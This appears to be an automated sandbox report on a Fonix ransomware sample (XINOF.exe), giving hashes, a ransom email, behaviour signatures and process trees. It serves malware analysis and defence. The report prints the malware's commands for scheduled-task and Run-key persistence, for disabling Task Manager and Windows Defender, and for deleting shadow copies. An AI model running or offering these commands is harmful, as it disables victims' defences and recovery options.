Analysis
Max time kernel: 254s
Max time network: 134s
Platform: windows7_x64
Resource: win7
Submitted: 12-07-2020 07:16

Static task: static1
Behavioral task: behavioral1
Sample: XINOF.exe
Resource: win7
General
Target: XINOF.exe
Size: 561KB
MD5: ff23cd4f45d231f8af9f23a2e730bee6
SHA1: 0eea13dc19ab5de9ec7ffd81ef89bddf5994f6ef
SHA256: 4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa
SHA512: 78c90354ca919c7bdce56034b1a432e7c3a0860b9faf9d351f74c50c3a8521c343a29d5c9c8babbedcc741acdc4138dc6e3cdc2c8e337f97ed5b99cf583102e8
Malware Config
Extracted from: C:\Users\Admin\Desktop\How To Decrypt Files.hta
Email: Thunder@fonix.email
Signatures

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes: bcdedit.exe (2 instances)
    pid | process
    1296 | bcdedit.exe
    1776 | bcdedit.exe

Processes: wbadmin.exe
  pid | process
  1896 | wbadmin.exe
Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Modifies Installed Components in the registry (2 TTPs)

Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: XINOF.exe
    description | ioc | process
    File opened for modification | C:\Users\Admin\Pictures\UndoUnprotect.tiff | XINOF.exe
    File opened for modification | C:\Users\Admin\Pictures\StepRead.tiff | XINOF.exe
Drops startup file (7 IoCs)
  Processes: XINOF.exe
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Decrypt Files.hta | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.txt | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Decrypt Files.hta | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Help.txt | XINOF.exe
Modifies file permissions (1 TTPs, 1 IoCs)

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 8 IoCs)
  Processes: reg.exe (4 instances)
    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" | reg.exe
    Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" | reg.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | reg.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" | reg.exe
    Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" | reg.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Drops desktop.ini file(s) (64 IoCs)
  Processes: XINOF.exe
    description | ioc | process
    File created | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Music\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Music\desktop.ini | XINOF.exe
    File created | C:\Program Files\desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Documents\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Libraries\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Music\Sample Music\desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Contacts\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Favorites\Links for United States\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Videos\desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Recorded TV\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Desktop\desktop.ini | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Favorites\Links\desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | XINOF.exe
    File created | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | XINOF.exe
    File created | C:\Users\Public\Videos\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | XINOF.exe
    File created | C:\Users\Public\Videos\Sample Videos\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Desktop\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Pictures\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V8SX06NR\desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | XINOF.exe
    File created | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Downloads\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Favorites\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Links\desktop.ini | XINOF.exe
    File created | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | XINOF.exe
    File created | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | XINOF.exe
    File created | C:\Users\Admin\Searches\desktop.ini | XINOF.exe
    File created | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | XINOF.exe
    File created | C:\Program Files (x86)\desktop.ini | XINOF.exe
Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: label.exe (25 instances)
    description | ioc | process
    File opened (read-only) | \??\I: | label.exe
    File opened (read-only) | \??\M: | label.exe
    File opened (read-only) | \??\Q: | label.exe
    File opened (read-only) | \??\D: | label.exe
    File opened (read-only) | \??\N: | label.exe
    File opened (read-only) | \??\O: | label.exe
    File opened (read-only) | \??\P: | label.exe
    File opened (read-only) | \??\R: | label.exe
    File opened (read-only) | \??\T: | label.exe
    File opened (read-only) | \??\V: | label.exe
    File opened (read-only) | \??\W: | label.exe
    File opened (read-only) | \??\X: | label.exe
    File opened (read-only) | \??\F: | label.exe
    File opened (read-only) | \??\J: | label.exe
    File opened (read-only) | \??\K: | label.exe
    File opened (read-only) | \??\A: | label.exe
    File opened (read-only) | \??\B: | label.exe
    File opened (read-only) | \??\S: | label.exe
    File opened (read-only) | \??\Y: | label.exe
    File opened (read-only) | \??\Z: | label.exe
    File opened (read-only) | \??\E: | label.exe
    File opened (read-only) | \??\G: | label.exe
    File opened (read-only) | \??\H: | label.exe
    File opened (read-only) | \??\L: | label.exe
    File opened (read-only) | \??\U: | label.exe
Drops file in Program Files directory (64 IoCs)
  Processes: XINOF.exe
    description | ioc | process
    File opened for modification | C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML | XINOF.exe
    File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar | XINOF.exe
    File created | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key | XINOF.exe
    File opened for modification | C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sr.dll | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT | XINOF.exe
    File created | C:\Program Files\Windows Media Player\Visualizations\Help.txt | XINOF.exe
    File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png | XINOF.exe
    File created | C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UDT | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301 | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\Cpriv.key | XINOF.exe
    File created | C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\Cpriv.key | XINOF.exe
    File created | C:\Program Files\Windows Media Player\Network Sharing\How To Decrypt Files.hta | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Help.txt | XINOF.exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\ACEODEXL.DLL | XINOF.exe
    File created | C:\Program Files\Windows Defender\MpOAV.dll | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\MSOHEV.DLL | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF | XINOF.exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | XINOF.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\How To Decrypt Files.hta | XINOF.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\How To Decrypt Files.hta | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\WWLIB.DLL | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL | XINOF.exe
    File created | C:\Program Files\VideoLAN\VLC\locale\mai\Cpriv.key | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF | XINOF.exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll | XINOF.exe
    File opened for modification | C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak | XINOF.exe
    File opened for modification | C:\Program Files (x86)\Internet Explorer\jsdebuggeride.dll | XINOF.exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.ELM | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\How To Decrypt Files.hta | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx | XINOF.exe
    File created | C:\Program Files\Common Files\System\MSMAPI\Help.txt | XINOF.exe
    File created | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png | XINOF.exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatializer_plugin.dll | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar | XINOF.exe
    File created | C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\Cpriv.key | XINOF.exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\Help.txt | XINOF.exe
    File opened for modification | C:\Program Files\Java\jre7\bin\npt.dll | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg | XINOF.exe
    File created | C:\Program Files (x86)\MSBuild\Microsoft\Cpriv.key | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML | XINOF.exe
    File created | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png | XINOF.exe
    File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\How To Decrypt Files.hta | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF | XINOF.exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac | XINOF.exe
    File created | C:\Program Files\Common Files\Microsoft Shared\ink\Help.txt | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV | XINOF.exe
    File created | C:\Program Files (x86)\Adobe\Cpriv.key | XINOF.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar | XINOF.exe
    File opened for modification | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF | XINOF.exe
Drops file in Windows directory (6 IoCs)
  Processes: wbadmin.exe, XINOF.exe
    description | ioc | process
    File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | wbadmin.exe
    File created | C:\Windows\How To Decrypt Files.hta | XINOF.exe
    File created | C:\Windows\Help.txt | XINOF.exe
    File created | C:\Windows\Cpriv.key | XINOF.exe
    File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | wbadmin.exe
    File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | wbadmin.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)
  Processes: WerFault.exe
    pid | pid_target | process | target process
    316 | 1228 | WerFault.exe |

Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe
    pid | process
    740 | vssadmin.exe

Processes: mshta.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Modifies registry class (5 IoCs)
  Processes: Explorer.EXE
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_Classes\Local Settings | Explorer.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | Explorer.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
    Set value (data) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | Explorer.EXE
    Set value (data) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | Explorer.EXE
Runs ping.exe (1 TTPs, 2 IoCs)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes: mshta.exe
    pid | process
    812 | mshta.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: XINOF.exe, WerFault.exe, powershell.exe
    pid | process
    1492 | XINOF.exe (59 identical entries)
    316 | WerFault.exe (4 identical entries)
    1672 | powershell.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes: Explorer.EXE
    pid | process
    1156 | Explorer.EXE
Suspicious use of AdjustPrivilegeToken (61 IoCs)
  Processes: WerFault.exe, WMIC.exe, vssvc.exe, Explorer.EXE, powershell.exe
    description | pid | process
    Token: SeDebugPrivilege | 316 | WerFault.exe
    Token: SeIncreaseQuotaPrivilege | 1620 | WMIC.exe
    Token: SeSecurityPrivilege | 1620 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 1620 | WMIC.exe
    Token: SeLoadDriverPrivilege | 1620 | WMIC.exe
    Token: SeSystemProfilePrivilege | 1620 | WMIC.exe
    Token: SeSystemtimePrivilege | 1620 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 1620 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 1620 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 1620 | WMIC.exe
    Token: SeBackupPrivilege | 1620 | WMIC.exe
    Token: SeRestorePrivilege | 1620 | WMIC.exe
    Token: SeShutdownPrivilege | 1620 | WMIC.exe
    Token: SeDebugPrivilege | 1620 | WMIC.exe
    Token: SeSystemEnvironmentPrivilege | 1620 | WMIC.exe
    Token: SeRemoteShutdownPrivilege | 1620 | WMIC.exe
    Token: SeUndockPrivilege | 1620 | WMIC.exe
    Token: SeManageVolumePrivilege | 1620 | WMIC.exe
    Token: 33 | 1620 | WMIC.exe
    Token: 34 | 1620 | WMIC.exe
    Token: 35 | 1620 | WMIC.exe
    (the preceding 20 WMIC.exe entries are recorded a second time in the same order)
    Token: SeBackupPrivilege | 1040 | vssvc.exe
    Token: SeRestorePrivilege | 1040 | vssvc.exe
    Token: SeAuditPrivilege | 1040 | vssvc.exe
    Token: SeShutdownPrivilege | 1156 | Explorer.EXE (9 identical entries)
    Token: SeDebugPrivilege | 1672 | powershell.exe
    Token: SeShutdownPrivilege | 1156 | Explorer.EXE (7 identical entries)
Suspicious use of FindShellTrayWindow (46 IoCs)
  Processes: Explorer.EXE
    pid | process
    1156 | Explorer.EXE (46 identical entries)

Suspicious use of SendNotifyMessage (50 IoCs)
  Processes: Explorer.EXE
    pid | process
    1156 | Explorer.EXE (50 identical entries)
Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: XINOF.exe, cmd.exe (11 instances)
    description | pid | process | target process
    PID 1492 wrote to memory of 1016 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1016 wrote to memory of 388 | 1016 | cmd.exe | schtasks.exe (3 entries)
    PID 1492 wrote to memory of 112 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 112 wrote to memory of 736 | 112 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1112 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1112 wrote to memory of 1036 | 1112 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1032 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1032 wrote to memory of 1516 | 1032 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1508 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1508 wrote to memory of 1676 | 1508 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1296 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1296 wrote to memory of 1784 | 1296 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1768 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1768 wrote to memory of 1764 | 1768 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1844 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1844 wrote to memory of 1848 | 1844 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1884 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1884 wrote to memory of 1376 | 1884 | cmd.exe | reg.exe (3 entries)
    PID 1492 wrote to memory of 1692 | 1492 | XINOF.exe | cmd.exe (3 entries)
    PID 1692 wrote to memory of 1508 | 1692 | cmd.exe | cmd.exe (3 entries)
    PID 1508 wrote to memory of 1384 | 1508 | cmd.exe | icacls.exe (3 entries)
    PID 1492 wrote to memory of 1768 | 1492 | XINOF.exe | cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XINOF.exe"C:\Users\Admin\AppData\Local\Temp\XINOF.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/Fonix.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe (depth 3): schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/Fonix.exe /RU SYSTEM /RL HIGHEST /F
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
-
